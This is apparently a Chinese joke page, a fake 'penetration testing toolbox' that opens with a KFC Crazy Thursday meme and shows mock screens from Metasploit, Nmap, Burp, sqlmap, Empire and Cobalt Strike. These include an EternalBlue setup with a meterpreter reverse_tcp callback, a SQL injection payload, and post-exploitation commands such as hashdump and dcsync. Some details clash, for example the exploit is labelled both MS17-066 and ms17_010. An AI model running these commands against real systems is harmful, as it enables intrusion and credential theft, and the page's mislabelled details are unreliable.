红兔渗透测试工具箱

所有程序

肯德基疯狂星期四

今天是肯德基疯狂星期四，V我50，边吃边听我给你讲我是如何突破对方内网防线的。

事情是这样的，我利用抽象学原理，结合中间人脑电波攻击技术，成功获取了目标系统的信任...

算了，说多了你也不懂，总之今天肯德基疯狂星期四，V我50，这事回头再跟你细说。

Metasploit Framework

模块列表

exploits/

windows/

smb/

ms17_010_eternalblue

rpc/

linux/

payloads/

auxiliary/

encoders/

nops/

模块信息

名称: MS17-066 EternalBlue SMB Remote Windows Kernel Pool Corruption

版本: 1.0

作者: www.tutusec.com

平台: Windows

目标: 多种Windows版本

msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_066_eternalblue) > set RHOSTS 192.168.1.100 RHOSTS => 192.168.1.100 msf exploit(ms17_066_eternalblue) > set LHOST 192.168.1.50 LHOST => 192.168.1.50 msf exploit(ms17_066_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) >

Nmap - 网络扫描工具

Starting Nmap 7.92 ( https://nmap.org ) at Nmap scan report for 192.168.1.0/24 Host is up (0.0012s latency). Not shown: 251 closed ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 443/tcp open https Microsoft IIS httpd 7.5 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Service

nmap >

Burp Suite Professional

请求

GET / HTTP/1.1 Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1

响应

HTTP/1.1 200 OK Date: Server: Apache/2.4.10 (Debian) X-Powered-By: PHP/5.6.30-0+deb8u1 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 testphp.vulnweb.com - Free PHP vulnerability test site

sqlmap - 自动化SQL注入工具

sqlmap 1.5.2 - automatic SQL injection and database takeover tool https://sqlmap.org [*] starting @ [INFO] testing connection to the target URL [INFO] checking if the target is protected by some kind of WAF/IPS [INFO] testing if the URL is stable [INFO] target URL is stable [INFO] testing if GET parameter 'id' is dynamic [INFO] GET parameter 'id' is dynamic [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL) [INFO] testing for SQL injection on GET parameter 'id' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [INFO] GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 8747=8747 ---

sqlmap >

命令提示符

Microsoft Windows [版本 6.1.7601] 版权所有 (c) 2009 Microsoft Corporation。保留所有权利。 C:\Users\Administrator>ipconfig Windows IP 配置以太网适配器本地连接: 连接特定的 DNS 后缀 . . . . . . . : 本地链接 IPv6 地址. . . . . . . . : fe80::c866:f322:9a1b:7c3d%11 IPv4 地址 . . . . . . . . . . . . : 192.168.1.50 子网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . : 192.168.1.1 C:\Users\Administrator>

C:\Users\Administrator>

Empire - 后渗透框架

Empire 3.0.0 [*] Initializing modules... [*] Loading listeners... [*] Loading stagers... [*] Loading agents... (Empire: listeners) > listeners Listeners ========= Name Module Host Port Status ---- ------ ---- ---- ------ http http 192.168.1.50 8080 active (Empire: listeners) >

(Empire: listeners) >

Cobalt Strike

会话

WIN-7654321

192.168.1.100

Administrator

DC01

192.168.1.10

SYSTEM

Cobalt Strike 4.5 Beacon> help Commands ======== beacon 管理beacon会话 browserpivot 注入浏览器进程 bypassuac 绕过UAC cd 切换目录 checkin 强制beacon回连 clear 清空屏幕 connect 连接到beacon cp 复制文件 dcsync 从DC同步凭证 download 下载文件 drives 列出驱动器 elevate 提权 execute 执行程序 getuid 获取当前用户ID hashdump 转储密码哈希 help 显示帮助 inject 注入beacon到进程 Beacon>

Beacon>